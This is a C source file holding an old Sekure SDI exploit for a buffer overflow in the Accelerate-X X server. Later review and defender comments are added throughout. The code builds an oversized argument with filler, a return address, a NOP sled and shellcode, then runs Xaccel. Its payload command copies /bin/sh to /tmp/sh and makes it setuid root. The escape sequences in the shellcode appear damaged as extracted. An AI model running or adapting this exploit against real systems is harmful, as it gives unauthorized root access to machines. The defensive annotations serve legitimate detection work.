--- SDIaccelX.c ----
/*
 * SDI linux exploit for Accelerate-X
 * Sekure SDI - Brazilian Information Security Team
 * by c0nd0r <condor@sekure.org>
 *
 * This script will exploit a vulnerability found by KSRT team
 * in the Accelerate-X Xserver [<=5.0].
 *
 * --------------------------------------------------------------------
 * The vulnerable buffer was small so we've changed the usual order to:
 * [garbage][eip][lots nop][shellcode]
 * BTW, I've also changed the code to execute, it will create a setuid
 * shell owned by the superuser at /tmp/sh.
 * --------------------------------------------------------------------
 *
 * Warning: DO NOT USE THIS TOOL FOR ILLICIT ACTIVITIES! We take no
 * responsibility.
 *
 * Greets to jamez, bishop, bahamas, stderr, dumped, paranoia,
 * marty (NORDO!), vader, fcon, slide, c_orb and
 * specially to my sasazita. Also toxyn.org, pulhas.org,
 * superbofh.org (Phibernet rox) and el8.org.
 *
 * Laughs - lame guys who hacked the senado/planalto.gov.br
 * pay some attention to the site: SecurityDot.net (good point).
 * see you at #uground (irc.brasnet.org)
 */
#include <stdio.h>
/*
 * Payload buffer that main() copies into the argument it builds.
 * It is a run of encoded bytes followed by a plain-text command line;
 * the command copies /bin/sh to /tmp/sh and sets mode 6755 on the copy,
 * which matches the header's description of a setuid shell at /tmp/sh.
 *
 * NOTE(review): as extracted on this page the escape sequences inside the
 * literal appear damaged, so the array as shown presumably holds plain
 * text rather than the bytes the author intended.
 *
 * Defender view: the artifact this payload leaves behind is a
 * setuid/setgid file (mode 6755) at /tmp/sh. Periodic sweeps for
 * setuid files in world-writable directories catch it, and a /tmp
 * mounted nosuid makes the set-id bits on such a copy ineffective.
 */
/* generic shellcode */ char shellcode[] = "xebx31x5ex89x76x32x8dx5ex08x89x5ex36" "x8dx5ex0bx89x5ex3ax31xc0x88x46x07x88" "x46x0ax88x46x31x89x46x3exb0x0bx89xf3" "x8dx4ex32x8dx56x3excdx80x31xdbx89xd8" "x40xcdx80xe8xcaxffxffxff" "/bin/sh -c cp /bin/sh /tmp/sh; chmod 6755 /tmp/sh";
/*
 * Builds one long command-line argument in buf and then replaces this
 * process with /usr/X11R6/bin/Xaccel, passing buf as the only argument.
 *
 * argv[1], when present, is parsed with atoi() and replaces the default
 * offset of 1000.
 *
 * Argument layout written by the statements below:
 *   buf[0]        ':'
 *   buf[1..52]    filler 'X' bytes
 *   buf[53..56]   addr, least-significant byte first
 *   buf[57..499]  0x90 padding
 *   buf[500..]    the bytes of shellcode[]
 *
 * Defender notes:
 *  - Per the header comment, the flaw is a small buffer in the
 *    Accelerate-X server (versions <= 5.0) that this argument overruns;
 *    the server-side code is not shown here, so the exact copy site is
 *    unknown from this file.
 *  - Exposure presumably depends on Xaccel running with elevated
 *    privileges (the header speaks of a shell "owned by the superuser");
 *    confirm the installed file mode, and upgrade or drop the set-id bit
 *    where the server does not need it.
 *  - In exec auditing, an Xaccel invocation whose single argument starts
 *    with ':' and runs to several hundred bytes is the pattern this
 *    program produces.
 */
main ( int argc, char *argv[] ) { char buf[1024]; int x, y, offset=1000; long addr; int joe;
/* Optional offset override; atoi() reports no errors on bad input. */
if (argc > 1) offset = atoi ( argv[1]);
/* addr is the address of the local 'joe' plus offset; it is the value
 * stored at buf[53..56] below. */
/* return address */ addr = (long) &joe + offset;
/* Leading ':' followed by 52 filler bytes; x is 53 when the loop ends. */
buf[0] = ':'; for ( x = 1; x < 53; x++) buf[x] = 'X';
/* Store addr one byte at a time, low byte first; only the low 32 bits of
 * the long are written. */
buf[x++] = (addr & 0x000000ff); buf[x++] = (addr & 0x0000ff00) >> 8; buf[x++] = (addr & 0x00ff0000) >> 16; buf[x++] = (addr & 0xff000000) >> 24;
/* Pad with 0x90 up to and including index 499. */
for ( ; x < 500; x++) buf[x] = 0x90;
/* Append shellcode[] byte by byte starting at index 500. strlen() is
 * re-evaluated on every iteration, and x is not checked against
 * sizeof buf. */
for ( y = 0; y < strlen(shellcode); y++, x++) buf[x] = shellcode[y];
/* Status line on stderr. NOTE(review): %x is paired with addr, which is a
 * long, so specifier and argument type differ. The line breaks inside the
 * string literal are part of the text as extracted. */
fprintf (stderr, "
SDI Xaccel - Offset: %d | Addr: 0x%x
", offset, addr);
/* Writes a space over the first NUL byte that strlen() finds. buf is never
 * explicitly terminated above, so where that NUL sits depends on what the
 * stack already held. */
buf[strlen(buf)] = ' ';
/* Replace this process with the X server binary; buf is its only
 * argument. The return value of execl() is not checked. */
execl ( "/usr/X11R6/bin/Xaccel", "Xaccel", buf, (char *)0);
// setenv ( "EGG", buf, 1); // system ( "/bin/sh");
} ----- EOF ----------